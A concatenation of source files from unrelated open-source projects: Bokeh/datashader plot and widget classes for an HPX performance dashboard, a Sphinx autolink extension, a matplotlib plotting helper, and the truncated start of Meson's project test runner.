self._root.on_event(MouseMove, self._mouse_move_event)
self._root.add_tools(self._hover_tool)
self._root.image_rgba(image="img", source=self._ds, x="x", y="y", dw="dw", dh="dh")
self._root.image_rgba(image="img", source=self._hovered_ds, x="x", y="y", dw="dw", dh="dh")
def _calculate_ranges(self):
return self._data_ranges
def _mouse_move_event(self, event):
def update():
nonlocal event
# Convert plot coordinate to image coordinate
x = (
int(
self._defaults_opts["plot_width"]
* (event.x - self._current_x_range[0])
/ (self._current_x_range[1] - self._current_x_range[0])
)
- 1
)
y = (
int(
self._defaults_opts["plot_height"]
* (event.y - self._current_y_range[0])
/ (self._current_y_range[1] - self._current_y_range[0])
)
- 1
)
shape = self._hover_agg["id_info"].values.shape
tooltip = False
id_patch = -1
if x < shape[1] and y < shape[0]:
id_patch = self._hover_agg["id_info"].values[y, x]
if not np.isnan(id_patch):
id_patch = int(id_patch)
begin = self._data[id_patch, 1]
end = self._data[id_patch, 2]
digits = abs(int(np.ceil(np.log10(end - begin)))) + 3
duration = format_time(end - begin)
self._hover_tool.tooltips = f"""Name: <b><em>{self._names[id_patch]}</em></b><br />
Duration: {duration}<br />
Start: {np.round(begin, digits)}s<br />
End : {np.round(end, digits)}s"""
# Generate mesh for hovered image
self._hovered_mesh[0] = self._vertices[id_patch * 4 : (id_patch + 1) * 4]
self._hovered_mesh[1] = [[0, 1, 2], [0, 2, 3]]
tooltip = True
if not tooltip:
self._hover_tool.tooltips = None
self._hovered_mesh = empty_task_mesh[0:2]
id_patch = str(id_patch)
if id_patch != self._last_hovered:
self._reshade(only_hover=True)
self._last_hovered = id_patch
self._throttled_mouseEvent.add_event(update)
def _reshade(self, immediate=False, only_hover=False):
""""""
def push_to_datasource(ds, img):
ds.data = {
"img": [img.values],
"x": [self._current_x_range[0]],
"y": [self._current_y_range[0]],
"dw": [self._current_x_range[1] - self._current_x_range[0]],
"dh": [self._current_y_range[1] - self._current_y_range[0]],
}
def update():
nonlocal only_hover
if not only_hover:
self._img, self._hover_agg = shade_mesh(
self._vertices,
self._triangles,
self.task_cmap,
plot_width=self._defaults_opts["plot_width"],
plot_height=self._defaults_opts["plot_height"],
x_range=self._current_x_range,
y_range=self._current_y_range,
)
if not only_hover:
self._doc.add_next_tick_callback(partial(push_to_datasource, self._ds, self._img))
self._hovered_img, _ = shade_mesh(
*self._hovered_mesh,
"black",
plot_width=self._defaults_opts["plot_width"],
plot_height=self._defaults_opts["plot_height"],
x_range=self._current_x_range,
y_range=self._current_y_range,
)
self._doc.add_next_tick_callback(
partial(push_to_datasource, self._hovered_ds, self._hovered_img)
)
if immediate:
WorkerQueue().put("task_raster", update)
else:
self._throttledEvent.add_event(lambda: WorkerQueue().put("task_raster", update))
def set_data(
self,
vertices,
triangles,
data_ranges,
names,
data,
x_range=None,
y_range=None,
):
""""""
self._vertices = vertices
self._triangles = triangles
self._data_ranges = data_ranges
self._names = names
self._data = data
_x_range, _y_range = self._calculate_ranges()
if not self._keep_range:
if x_range:
self._current_x_range = x_range
else:
self._current_x_range = _x_range
if y_range:
self._current_y_range = y_range
else:
self._current_y_range = _y_range
self._reshade(True)
class ShadedTimeSeries(ShadedPlot):
""""""
def __init__(
self,
doc,
data,
colors=None,
refresh_rate=500,
**kwargs,
):
""""""
self._colors = colors
self._data = data
super().__init__(doc, refresh_rate, **kwargs)
img = shade_line(
data,
colors,
plot_width=self._defaults_opts["plot_width"],
plot_height=self._defaults_opts["plot_height"],
x_range=self._current_x_range,
y_range=self._current_y_range,
)
self._ds = ColumnDataSource(
{
"img": [img.values],
"dw": [self._current_x_range[1] - self._current_x_range[0]],
"dh": [self._current_y_range[1] - self._current_y_range[0]],
"x": [self._current_x_range[0]],
"y": [self._current_y_range[0]],
}
)
self._root.image_rgba(image="img", source=self._ds, x="x", y="y", dw="dw", dh="dh")
def _calculate_ranges(self):
return _normalize_ranges(*get_ranges(self._data))
def _reshade(self, immediate=False):
""""""
def gen():
img = shade_line(
self._data,
self._colors,
plot_width=self._defaults_opts["plot_width"],
plot_height=self._defaults_opts["plot_height"],
x_range=self._current_x_range,
y_range=self._current_y_range,
)
self._ds.data = {
"img": [img.values],
"x": [self._current_x_range[0]],
"y": [self._current_y_range[0]],
"dw": [self._current_x_range[1] - self._current_x_range[0]],
"dh": [self._current_y_range[1] - self._current_y_range[0]],
}
if immediate:
gen()
else:
self._throttledEvent.add_event(gen)
def set_data(
self,
data,
colors=None,
x_range=None,
y_range=None,
):
""""""
self._data = data
_x_range, _y_range = self._calculate_ranges()
if not self._keep_range:
if x_range:
self._current_x_range = x_range
else:
self._current_x_range = _x_range
if y_range:
self._current_y_range = y_range
else:
self._current_y_range = _y_range
if colors:
self._colors = colors
self._reshade(True)
```
#### File: server/plots/tasks.py
```python
from bokeh.layouts import column
from bokeh.models import MultiChoice # , HoverTool
from .base import BaseElement, get_figure_options
from ..data import DataSources
from .raster import ShadedTaskPlot, empty_task_mesh
from ..widgets import BaseWidget
from ...common.constants import task_cmap
class FilterWidget(BaseWidget):
def __init__(self, doc, callback, refresh_rate=500, collection=None, **kwargs):
super().__init__(
doc, callback=callback, refresh_rate=refresh_rate, collection=collection, **kwargs
)
self._choices = []
self._root = MultiChoice(options=self._choices, title="Filter tasks")
self._root.on_change("value", self._on_change)
def _on_change(self, attr, old, new):
self._callback(new)
def set_choices(self, choices):
if choices != self._choices:
self._choices = choices
self._root.options = list(self._choices)
class TasksPlot(BaseElement):
def __init__(
self,
doc,
locality="0",
window_size=10,
worker="*",
collection=None,
refresh_rate=500,
cmap=task_cmap,
**kwargs,
):
""""""
super().__init__(doc, refresh_rate, collection)
self._locality = locality
self._last_run = -1
self._task_names = set()
self._filter_list = []
self._locality = "0"
# Make plot and figure
defaults_opts = dict(
title="Task plot",
tools="save,reset,xwheel_zoom,xpan",
toolbar_location="above",
x_axis_label="Time (s)",
y_axis_label="Worker ID",
plot_width=800,
plot_height=600,
)
defaults_opts.update(
(key, value) for key, value in kwargs.items() if key in get_figure_options()
)
self._num_points = 0
self._figure = ShadedTaskPlot(
doc,
*empty_task_mesh,
[],
[],
refresh_rate=refresh_rate,
cmap=cmap,
**defaults_opts,
)
self._filter_choice = FilterWidget(doc, self.set_filter_list, collection=collection)
# Right now, filtering is not implemented
self._root = column(self._figure.layout()) # , self._filter_choice.layout())
def set_filter_list(self, filters):
"""Sets a filter to show only particular tasks"""
if isinstance(filters, str):
self._filter_list = [filters]
elif isinstance(filters, list):
self._filter_list = filters
self._num_points = -1
def _update_data(self):
""""""
collection = DataSources().get_collection(self._collection)
if not collection:
return
names = collection.get_task_names(self._locality)
if names != self._task_names:
self._task_names = names
self._filter_choice.set_choices(names)
verts, tris, data_ranges = collection.task_mesh_data(self._locality)
task_data, names = collection.task_data(self._locality)
if len(verts) != self._num_points:
self._figure.set_data(verts, tris, data_ranges, names, task_data)
self._num_points = len(verts)
def set_instance(self, locality):
self._locality = locality
self._num_points = -1
self._update_data()
def update(self):
super().update()
self._update_data()
```
#### File: server/widgets/widgets.py
```python
import copy
from datetime import datetime
import json
from bokeh.layouts import column, row
from bokeh.models.widgets import Button, Div, Toggle, TextAreaInput
from .base import BaseWidget, empty_placeholder
from ..plots import generator
from .select import DataCollectionSelect, SelectCustomLine
from ...common.logger import Logger
from ..data import DataAggregator, from_instance
logger = Logger()
class CustomCounterWidget(BaseWidget):
"""Produces a widget for plotting any counters"""
def __init__(self, doc, refresh_rate=1000, collection=None, **kwargs):
"""Produces a widget that allows the user to add / remove plots for any
counters from any collection
Arguments
---------
doc : Bokeh Document
bokeh document for auto-updating the widget
refresh_rate : int
refresh rate at which the Select refreshes and checks for new data collections (in ms)
**kwargs
arguments for the bokeh Select widget
"""
super().__init__(doc, refresh_rate=refresh_rate, collection=collection, **kwargs)
self._defaults_opts = dict(plot_width=800, plot_height=300)
self._defaults_opts.update((key, value) for key, value in kwargs.items())
self._lines = {}
self._lines_info = set()
self._line_counter = 0
# Buttons for editing the lines
self._add_line_b = Button(label="+", width=40)
self._add_line_b.on_click(self._add_line)
# Toggle button for the shading of the plots
self._shade_b = Toggle(label="Toggle plot shading", width=150)
self._shade_b.on_click(self._toggle_shade)
# Buttons for adding and removing plots
self._add_plot_b = Button(label="+", width=40)
self._add_plot_b.on_click(self._add_plot)
self._remove_plot_b = Button(label="-", width=40)
self._remove_plot_b.on_click(self._remove_plot)
# For editing the lines
self._edit_button = Toggle(label="Edit lines", width=100)
self._edit_button.on_click(self._toggle_edit)
self._json_input = TextAreaInput(
title="Export / inport widget:", width=500, max_length=20000
)
self._json_update_button = Button(label="Update from input", width=150)
self._json_update_button.on_click(self._set_from_input)
self._save_button = Button(label="Save state of widget to session", width=170)
self._save_button.on_click(self._save_widget)
self._root = column(
row(
Div(text="Add or remove plots:"),
self._remove_plot_b,
self._add_plot_b,
self._edit_button,
self._shade_b,
self._save_button,
),
empty_placeholder(),
empty_placeholder(),
)
self._plots = []
self._add_plot()
# If there is a saved state in the session of the widget
json_txt = DataAggregator().get_custom_widget_config()
if json_txt:
self.from_json(json_txt)
def _remove_line(self, idx):
del self._lines[idx]
self._update_line_widget()
def _add_line(self, update=True):
plots_text = [f"Plot {i + 1}" for i, _ in enumerate(self._plots)]
self._line_counter += 1
self._lines[self._line_counter] = SelectCustomLine(
self._doc,
self._line_counter,
plots_text,
self._remove_line,
)
if update:
self._update_line_widget()
def _toggle_shade(self, shade):
for plot in self._plots:
plot.toggle_shade()
def _save_widget(self):
DataAggregator().set_custom_widget_config(json.loads(self.to_json()))
def _update_plots(self):
plots = [plot.layout() for plot in self._plots]
self._root.children[2] = column(*plots)
# Update the lines with the available plots
plots_text = [f"Plot {i + 1}" for i, _ in enumerate(self._plots)]
for line in self._lines.values():
line.set_plots(plots_text)
def _update_line_widget(self):
lines = [line.layout() for line in self._lines.values()]
self._root.children[1] = column(
row(self._json_input, self._json_update_button),
row(self._add_line_b, Div(text="Add line")),
*lines,
)
def _toggle_edit(self, edit):
if edit:
self._update_line_widget()
else:
self._root.children[1] = empty_placeholder()
def _add_plot(self):
opts = copy.deepcopy(self._defaults_opts)
self._plots.append(
generator.TimeSeries(
self._doc,
refresh_rate=self._refresh_rate,
title=f"Plot {len(self._plots) + 1}",
**opts,
)
)
self._update_plots()
def _set_from_input(self):
self._toggle_edit(False)
self._edit_button.active = False
self.from_json(self._json_input.value)
def to_json(self):
"""Converts the state of the widget (number of plots, lines) to json"""
json_dict = {"num_plots": len(self._plots), "lines": []}
for plot_id, _, countername, instance, name in self._lines_info:
json_dict["lines"].append(
{"plot_id": plot_id, "countername": countername, "instance": instance, "name": name}
)
return json.dumps(json_dict)
def from_json(self, json_txt):
"""Takes a json as input and generates the corresponding plots and widgets.
Returns True if successful, False otherwise."""
json_dict = {}
try:
json_dict = json.loads(json_txt.rstrip())
except json.decoder.JSONDecodeError as e:
logger.error(f"JSON decode error: {e.msg}")
if "lines" not in json_dict:
return False
num_plots = 1
if "num_plots" in json_dict:
num_plots = json_dict["num_plots"]
# Remove all the lines
self._lines.clear()
# Set the correct number of plots
if num_plots > len(self._plots):
for _ in range(num_plots - len(self._plots)):
self._add_plot()
elif num_plots < len(self._plots):
for _ in range(len(self._plots) - num_plots):
self._remove_plot()
for line in json_dict["lines"]:
if not isinstance(line, dict):
return False
if (
"plot_id" not in line
or "countername" not in line
or "instance" not in line
or "name" not in line
):
return False
if not from_instance(tuple(line["instance"])):
return False
locality_id, pool, thread_id = from_instance(line["instance"])
self._add_line(False)
self._lines[self._line_counter].set_properties(
line["plot_id"],
None,
line["countername"],
locality_id,
pool,
thread_id,
line["name"],
)
return True
def update(self):
lines = set()
for line in self._lines.values():
lines.add(line.properties())
deleted_lines = self._lines_info.difference(lines)
new_lines = lines.difference(self._lines_info)
for plot_id, collection, countername, instance, name in deleted_lines:
if len(self._plots) >= plot_id:
self._plots[plot_id - 1].remove_line(countername, instance, collection, name)
for plot_id, collection, countername, instance, name in new_lines:
self._plots[plot_id - 1].add_line(countername, instance, collection, name)
self._lines_info = lines
self._json_input.value = self.to_json()
def _remove_plot(self):
if len(self._plots) == 1:
return
del self._plots[-1]
self._update_plots()
class DataCollectionWidget(BaseWidget):
"""Produces a widget for selecting current and past data collection instances"""
def __init__(self, doc, callback, refresh_rate=500, **kwargs):
"""Produces a widget that shows all the current and past data collection instances
in the form of a Select.
Arguments
---------
doc : Bokeh Document
bokeh document for auto-updating the widget
callback : function(collection: DataCollection)
callback for notifying when the user selects a certain data collection
refresh_rate : int
refresh rate at which the Select refreshes and checks for new data collections (in ms)
**kwargs
arguments for the bokeh Select widget
"""
super().__init__(doc, callback, refresh_rate=refresh_rate, **kwargs)
self._selected_collection = None
self._select = DataCollectionSelect(doc, self._set_collection, refresh_rate=refresh_rate)
self._div = Div(text="<b>No data available</b>")
self._root = column(self._select.layout(), self._div)
def _set_collection(self, collection):
""""""
self._selected_collection = collection
self._callback(collection)
self.update()
def update(self):
super().update()
collection = None
most_recent_flag = False
if not self._selected_collection:
most_recent_flag = True
collection = DataAggregator().get_live_collection()
else:
collection = self._selected_collection
if collection:
collection_list = DataAggregator().data
index = collection_list.index(collection)
collection = collection_list[index]
# Title of the run
title = f"Run #{index}"
if DataAggregator().get_current_run() == collection:
if most_recent_flag:
title += " (most recent, live)"
else:
title += " (live)"
elif most_recent_flag:
title += " (most recent)"
# Timings of the run
begin_time = datetime.fromtimestamp(int(collection.start_time))
time_info = f"<em>Start</em>: {begin_time}<br />"
if collection.end_time:
end_time = datetime.fromtimestamp(int(collection.end_time))
time_info += f"<em>End</em>: {end_time}"
# Num threads and localities
localities = collection.get_localities()
num_workers = 0
if localities:
num_workers = collection.get_num_worker_threads(localities[0])
instance_info = ""
if len(localities) == 1:
instance_info += "1 locality"
else:
instance_info += f"{len(localities)} localities"
instance_info += "<br />"
if num_workers == 1:
instance_info += "1 thread per locality"
else:
instance_info += f"{num_workers} threads per locality"
text = f"""<span class="run_summary"><h3 class="run_title">{title}</h3><br />
{time_info}<br />
{instance_info}</span>"""
if text != self._div.text:
self._div.text = text
``` |
{
"source": "jokteur/hpx",
"score": 2
} |
#### File: sphinx/extensions/sphinx-hpx.py
```python
from docutils import nodes
def setup(app):
app.add_role('hpx-issue', autolink('https://github.com/STEllAR-GROUP/hpx/issues/%s', "Issue #"))
app.add_role('hpx-pr', autolink('https://github.com/STEllAR-GROUP/hpx/pull/%s', "PR #"))
app.add_role('cppreference-header', autolink('http://en.cppreference.com/w/cpp/header/%s'))
app.add_role('cppreference-algorithm', autolink('http://en.cppreference.com/w/cpp/algorithm/%s'))
app.add_role('cppreference-memory', autolink('http://en.cppreference.com/w/cpp/memory/%s'))
app.add_role('cppreference-container', autolink('http://en.cppreference.com/w/cpp/container/%s'))
def autolink(pattern, prefix=''):
def role(name, rawtext, text, lineno, inliner, options={}, content=[]):
url = pattern % (text,)
node = nodes.reference(rawtext, prefix + text, refuri=url, **options)
return [node], []
return role
```
#### File: network/network_storage/plot_utils.py
```python
import optparse
import math
import itertools
import matplotlib
#----------------------------------------------------------------------------
# Arguments and help
parser = optparse.OptionParser()
parser.add_option("--fig-size", type = "string", default = None)
parser.add_option("--show", action = "store_true", dest = "show_graph", default = False)
parser.add_option("--verbose", action = "store_true", default = False)
parser.add_option("--quiet", action = "store_true", default = False)
parser.add_option("--title", action = "store", dest = "title", default = False)
options, args = parser.parse_args();
#----------------------------------------------------------------------------
# convenience definitions to loop over all marker/colour styles
# if we have a lot of lines on the same graph
colours = ('r','g','b','c','y','m','k')
markers = ('+', '.', 'o', '*', '^', 's', 'v', ',', '<', '>', '8', 's', 'p', 'h', 'H', 'D', 'd')
filled_markers = ('o', 'v', '^', '<', '>', '8', 's', 'p', '*', 'h', 'H', 'D', 'd')
#----------------------------------------------------------------------------
if (not options.show_graph) :
matplotlib.use('SVG')
# this import must come after the use() call above
import matplotlib.pyplot as plt
#----------------------------------------------------------------------------
# setup default size of plot if user didn't pass fig_size command line option
try :
size = list(map(float, options.fig_size.split(',')))
if len(size) == 2 :
print("found size ", size)
options.fig_size = (size, [0.1, 0.1, 0.85, 0.85])
elif len(size) == 6 :
options.fig_size = (size[0:2], size[2:6])
else :
raise ValueError("--fig-size must be a string of 2 or 6 numbers")
except :
options.fig_size = ([12, 9], [0.08, 0.14, 0.91, 0.83])
# options.fig_size = ([6, 8], [0.16, 0.22, 0.79, 0.77])
#----------------------------------------------------------------------------
def maximum(iterable, default):
'''Like max(), but returns a default value if xs is empty.'''
try:
return max(iterable)
except ValueError:
return default
#----------------------------------------------------------------------------
def minimum(iterable, default):
'''Like min(), but returns a default value if xs is empty.'''
try:
return min(iterable)
except ValueError:
return default
#----------------------------------------------------------------------------
def sizeof_bytes(num):
'''Output a number as human readable bytes.'''
for x in ['bytes','KB','MB','GB','TB']:
if num < 1024.0:
return "%.0f %s" % (num, x)
num /= 1024.0
#----------------------------------------------------------------------------
# plot N series of data onto a single graph
# each series is a array, there are N arrays in the supplied map
# graph_map, a map of arrays of {x,y,other} data
# labelstrings, {xaxis, yaxis, series_variable}
def plot_one_collection(graph_map, labelstrings, axes, axisfunction, minmax) :
print("Plotting %i series of '%s'" % (len(graph_map), labelstrings[2]))
# for convenience/brevity get the base, min, max for each exis
xb = minmax[0][0]
x1 = minmax[0][1]
x2 = minmax[0][2]
xm = minmax[0][3]
yb = minmax[1][0]
y1 = minmax[1][1]
y2 = minmax[1][2]
ym = minmax[1][3]
# restart markers and colours from beginning of list for each new graph
localmarkers = itertools.cycle(markers)
localcolours = itertools.cycle(colours)
series_keys = sorted(graph_map.keys())
for index, value in enumerate(series_keys):
key = value
series = sorted(graph_map[key])
#print "The series is ", series
# we can just plot the series directly, but just in case we add support
# for error bars etc and use {x,y,stddev,etc...} in future, we will pull out
# the values for plotting manually.
values = [[v[0],v[1]] for v in series]
#print "the values are ", values
if (xb==0) and (yb==0):
axes.plot(*list(zip(*values)), markersize=8, marker=next(localmarkers), color=next(localcolours))
elif (xb!=0) and (yb==0):
axes.semilogx(*list(zip(*values)), basex=xb, markersize=8, marker=next(localmarkers), color=next(localcolours))
elif (xb==0) and (yb!=0):
axes.semilogy(*list(zip(*values)), basey=yb, markersize=8, marker=next(localmarkers), color=next(localcolours))
elif (xb!=0) and (yb!=0):
axes.loglog(*list(zip(*values)), basex=xb, basey=yb, markersize=8, marker=next(localmarkers), color=next(localcolours))
else:
print("Error, unsupported log/lin options")
# generate labels for each power of N on the axes
if (xb!=0):
# generate a list of numbers for the grid marks
xlabels = tuple(i for i in (xb**x for x in range(x1,x2+1)) )
# setup the xaxis parameters
axes.set_xlim(minimum(xlabels,1)*(1.0-xm), maximum(xlabels,3)*(1.0+xm))
axes.set_xticklabels(xlabels)
axes.set_xscale('log', basex=xb)
axes.xaxis.set_major_formatter(matplotlib.ticker.FuncFormatter(axisfunction))
axes.set_xlabel(labelstrings[0])
axes.tick_params(axis='x', which='major', labelsize=9)
axes.tick_params(axis='x', which='minor', labelsize=8)
else:
axes.set_xlim(x1, x2)
if (yb!=0):
# generate a list of numbers for the grid marks
ylabels = tuple(i for i in (yb**y for y in range(y1,y2+1)) )
# setup the yaxis parameters
axes.set_ylim(minimum(ylabels,1)*(1.0-ym), maximum(ylabels,3)*(1.0+ym))
axes.set_yticklabels(ylabels)
axes.set_yscale('log', basey=yb)
axes.yaxis.set_major_formatter(matplotlib.ticker.FuncFormatter(lambda x, pos: str('%.2f' % x)))
axes.set_ylabel(labelstrings[1])
axes.tick_params(axis='y', which='major', labelsize=9)
axes.tick_params(axis='y', which='minor', labelsize=8)
else:
axes.set_ylim(y1, y2)
axes.xaxis.grid(True)
axes.yaxis.grid(True)
#
# define some custom minor tick locations on y axis:
#
#axes.yaxis.set_minor_formatter(plt.FormatStrFormatter('%8.4d'))
#axes.yaxis.set_minor_locator(plt.FixedLocator([0.375,0.75,1.5,3,6,12]))
#axes.tick_params(axis='y', which='minor', labelsize=8)
#axes.grid(b=True, which='major', color='b', linestyle='-')
#axes.grid(b=True, which='minor', color='g', linestyle='--')
# coordinates are window coordinates from 0 to 1
axes.set_title(labelstrings[2], fontsize=10)
#----------------------------------------------------------------------------
def plot_configuration(graph_map, mapnames, axesnames, titlefunction, legendfunction, legendtitlefunction, axisfunction, minmax, bbox) :
fig = plt.figure(figsize = options.fig_size[0])
axes = []
# the supplied graphs come as a 2D array of params
num_param1 = len(list(graph_map.keys()))
num_param2 = len(list(graph_map[list(graph_map.keys())[0]].keys()))
# All the graphs of param2 will be the same type,
# but we need one legend per param1 regardless
# so num_param2legend is used in places to add space for the extra legend plot
num_param2legend = num_param2+1
numrows = num_param1
numcols = num_param2legend
# if the arrays is 1xN or Nx1, rearrange the num rows/cols
# to fit the page a little better instead of having one long row/column of plots
rearranged = False
if (num_param1==1) or (num_param2==1):
total = num_param1*num_param2legend
print("total is ", total)
better = int(math.sqrt(total))
numrows = better
numcols = int(math.ceil(total/float(better)))
rearranged = True
print("Rearranged graphs from %i x %i using layout %i x %i" % (num_param1, num_param2, numrows, numcols))
# create an array of graphs for our parameter space
# grid cells are defined by {row, col} from top left and down
print("Creating array of graphs rows %i, cols %i" % (numrows, numcols))
row = 0
col = 0
graph_keys = sorted(graph_map.keys())
for param1_i in range(num_param1):
param1_key = graph_keys[param1_i]
param1_results = graph_map[param1_key]
param1_keys = sorted(param1_results.keys())
print("param1_ type ", param1_key)
# The legend must cover all graphs, not just the final one plotted
legend_entries = []
for param2_i in range(num_param2):
newplot = plt.subplot2grid((numrows, numcols), (row, col), colspan=1)
axes.append( newplot )
try:
print("num params %i and keys" % num_param2, param1_keys)
param2_key = param1_keys[param2_i]
param2_results = param1_results[param2_key]
param2_keys = sorted(param2_results.keys())
print("param2_ type ", param2_key)
print("generating plot at {%i,%i}" % (row, col))
plot_one_collection(param2_results,
[axesnames[0], axesnames[1], mapnames[1] + " " + titlefunction(param2_key)],
newplot,axisfunction, minmax)
# merge lists for the legend
legend_entries = list(set(legend_entries) | set(param2_keys))
except:
print("Failed to plot {%i,%i}" % (row, col))
col += 1
if ((col % numcols)==0):
col = 0
row += 1
legend_entries = sorted(legend_entries)
# at the end of each param2 group, there should be a legend
leg = plt.subplot2grid((numrows, numcols), (row, col), colspan=1)
leg.axis('off')
leg.set_title(legendtitlefunction(param1_key))
print("Legend title removed ")
#leg.set_title(graph_keys[param1_i], fontsize=11)
axes.append( leg )
# restart markers and colours from beginning of list for each new graph
localmarkers = itertools.cycle(markers)
localcolours = itertools.cycle(colours)
for item in legend_entries:
leg.plot([], label=mapnames[2] + " " + legendfunction(item),
markersize=8,
marker=next(localmarkers),
color=next(localcolours))
leg.legend(
loc = 'lower left',
ncol=(1,1)[len(legend_entries)>5],
bbox_to_anchor=(bbox[0],bbox[1]),
fontsize=8,
handlelength=3, borderpad=1.2, labelspacing=1.2,
shadow=True)
print("added legend at {%i,%i}" % (row, col))
col += 1
# if we reach the end of the graph row
if ((col % numcols)==0):
col = 0
row += 1
plt.tight_layout()
if options.show_graph :
plt.show()
return fig
#----------------------------------------------------------------------------
def insert_safe(a_map, key1, key2, key3, value) :
#print(key1,key2,key3,value[0],value[1])
found = False
# create the 3 level deep map entries if they are not present
if not (key1) in a_map:
a_map[key1] = {}
if not (key2) in a_map[key1]:
a_map[key1][key2] = {}
if not (key3) in a_map[key1][key2]:
a_map[key1][key2][key3] = []
for item in a_map[key1][key2][key3]:
if item[0] == value[0]:
item[1] = item[1]+value[1]
item[2] += 1
found = True;
print(key1,key2,key3,value[0],value[1], "Duplicate", item[2])
break
if (not found):
a_map[key1][key2][key3].append(value + [1])
#----------------------------------------------------------------------------
def average_map(a_map) :
for key1 in a_map:
for key2 in a_map[key1]:
for key3 in a_map[key1][key2]:
for value in a_map[key1][key2][key3]:
if value[2]>1:
value[1] = value[1]/value[2]
``` |
{
"source": "jok-ts/meson",
"score": 2
} |
#### File: jok-ts/meson/run_project_tests.py
```python
from glob import glob
import os, subprocess, shutil, sys, signal
from io import StringIO
from ast import literal_eval
import sys, tempfile
from mesonbuild import environment
from mesonbuild import mesonlib
from mesonbuild import mlog
from mesonbuild import mesonmain
from mesonbuild.mesonlib import stringlistify
from mesonbuild.scripts import meson_test, meson_benchmark
import argparse
import xml.etree.ElementTree as ET
import time
import multiprocessing
import concurrent.futures as conc
from mesonbuild.coredata import backendlist
class TestResult:
def __init__(self, msg, stdo, stde, mlog, conftime=0, buildtime=0, testtime=0):
self.msg = msg
self.stdo = stdo
self.stde = stde
self.mlog = mlog
self.conftime = conftime
self.buildtime = buildtime
self.testtime = testtime
class AutoDeletedDir():
def __init__(self, d):
self.dir = d
def __enter__(self):
os.makedirs(self.dir, exist_ok=True)
return self.dir
def __exit__(self, _type, value, traceback):
# On Windows, shutil.rmtree fails sometimes, because 'the directory is not empty'.
# Retrying fixes this.
# That's why we don't use tempfile.TemporaryDirectory, but wrap the deletion in the AutoDeletedDir class.
retries = 5
for i in range(0, retries):
try:
shutil.rmtree(self.dir)
return
except OSError:
if i == retries-1:
raise
time.sleep(0.1 * (2**i))
passing_tests = 0
failing_tests = 0
skipped_tests = 0
failing_logs = []
print_debug = 'MESON_PRINT_TEST_OUTPUT' in os.environ
do_debug = not {'MESON_PRINT_TEST_OUTPUT', 'TRAVIS', 'APPVEYOR'}.isdisjoint(os.environ)
meson_command = os.path.join(os.getcwd(), 'meson')
if not os.path.exists(meson_command):
meson_command += '.py'
if not os.path.exists(meson_command):
raise RuntimeError('Could not find main Meson script to run.')
class StopException(Exception):
def __init__(self):
super().__init__('Stopped by user')
stop = False
def stop_handler(signal, frame):
global stop
stop = True
signal.signal(signal.SIGINT, stop_handler)
signal.signal(signal.SIGTERM, stop_handler)
#unity_flags = ['--unity']
unity_flags = []
backend_flags = None
compile_commands = None
test_commands = None
install_commands = None
def setup_commands(backend):
global backend_flags, compile_commands, test_commands, install_commands
msbuild_exe = shutil.which('msbuild')
if backend == 'vs2010' or (backend is None and msbuild_exe is not None):
backend_flags = ['--backend=vs2010']
compile_commands = ['msbuild']
test_commands = ['msbuild', 'RUN_TESTS.vcxproj']
install_commands = []
elif backend == 'vs2015':
backend_flags = ['--backend=vs2015']
compile_commands = ['msbuild']
test_commands = ['msbuild', 'RUN_TESTS.vcxproj']
install_commands = []
elif backend == 'xcode' or (backend is None and mesonlib.is_osx()):
backend_flags = ['--backend=xcode']
compile_commands = ['xcodebuild']
test_commands = ['xcodebuild', '-target', 'RUN_TESTS']
install_commands = []
else:
backend_flags = []
ninja_command = environment.detect_ninja()
if ninja_command is None:
raise RuntimeError('Could not find Ninja v1.6 or newer')
if do_debug:
compile_commands = [ninja_command, '-v']
else:
compile_commands = [ninja_command]
compile_commands += ['-w', 'dupbuild=err']
test_commands = [ninja_command, 'test', 'benchmark']
install_commands = [ninja_command, 'install']
def get_relative_files_list_from_dir(fromdir):
paths = []
for (root, _, files) in os.walk(fromdir):
reldir = os.path.relpath(root, start=fromdir)
for f in files:
path = os.path.join(reldir, f).replace('\\', '/')
if path.startswith('./'):
path = path[2:]
paths.append(path)
return paths
def platform_fix_exe_name(fname):
if not fname.endswith('?exe'):
return fname
fname = fname[:-4]
if mesonlib.is_windows():
return fname + '.exe'
return fname
def validate_install(srcdir, installdir):
# List of installed files
info_file = os.path.join(srcdir, 'installed_files.txt')
# If this exists, the test does not install any other files
noinst_file = 'usr/no-installed-files'
expected = {}
found = {}
ret_msg = ''
# Generate list of expected files
if os.path.exists(os.path.join(installdir, noinst_file)):
expected[noinst_file] = False
elif os.path.exists(info_file):
with open(info_file) as f:
for line in f:
expected[platform_fix_exe_name(line.strip())] = False
# Check if expected files were found
for fname in expected:
if os.path.exists(os.path.join(installdir, fname)):
expected[fname] = True
for (fname, found) in expected.items():
if not found:
ret_msg += 'Expected file {0} missing.\n'.format(fname)
# Check if there are any unexpected files
found = get_relative_files_list_from_dir(installdir)
for fname in found:
if fname not in expected and not fname.endswith('.pdb'):
ret_msg += 'Extra file {0} found.\n'.format(fname)
return ret_msg
def log_text_file(logfile, testdir, stdo, stde):
global stop, executor, futures
logfile.write('%s\nstdout\n\n---\n' % testdir)
logfile.write(stdo)
logfile.write('\n\n---\n\nstderr\n\n---\n')
logfile.write(stde)
logfile.write('\n\n---\n\n')
if print_debug:
print(stdo)
print(stde, file=sys.stderr)
if stop:
print("Aborting..")
for f in futures:
f[2].cancel()
executor.shutdown()
raise StopException()
def run_configure_inprocess(commandlist):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
old_stderr = sys.stderr
sys.stderr = mystderr = StringIO()
try:
returncode = mesonmain.run(commandlist[0], commandlist[1:])
finally:
sys.stdout = old_stdout
sys.stderr = old_stderr
return (returncode, mystdout.getvalue(), mystderr.getvalue())
def run_test_inprocess(testdir):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
old_stderr = sys.stderr
sys.stderr = mystderr = StringIO()
old_cwd = os.getcwd()
os.chdir(testdir)
try:
returncode_test = meson_test.run(['meson-private/meson_test_setup.dat'])
returncode_benchmark = meson_benchmark.run(['meson-private/meson_benchmark_setup.dat'])
finally:
sys.stdout = old_stdout
sys.stderr = old_stderr
os.chdir(old_cwd)
return (max(returncode_test, returncode_benchmark), mystdout.getvalue(), mystderr.getvalue())
def parse_test_args(testdir):
args = []
try:
with open(os.path.join(testdir, 'test_args.txt'), 'r') as f:
content = f.read()
try:
args = literal_eval(content)
except Exception:
raise Exception('Malformed test_args file.')
args = stringlistify(args)
except FileNotFoundError:
pass
return args
def run_test(skipped, testdir, extra_args, flags, compile_commands, install_commands, should_fail):
if skipped:
return None
with AutoDeletedDir(tempfile.mkdtemp(prefix='b ', dir='.')) as build_dir:
with AutoDeletedDir(tempfile.mkdtemp(prefix='i ', dir=os.getcwd())) as install_dir:
try:
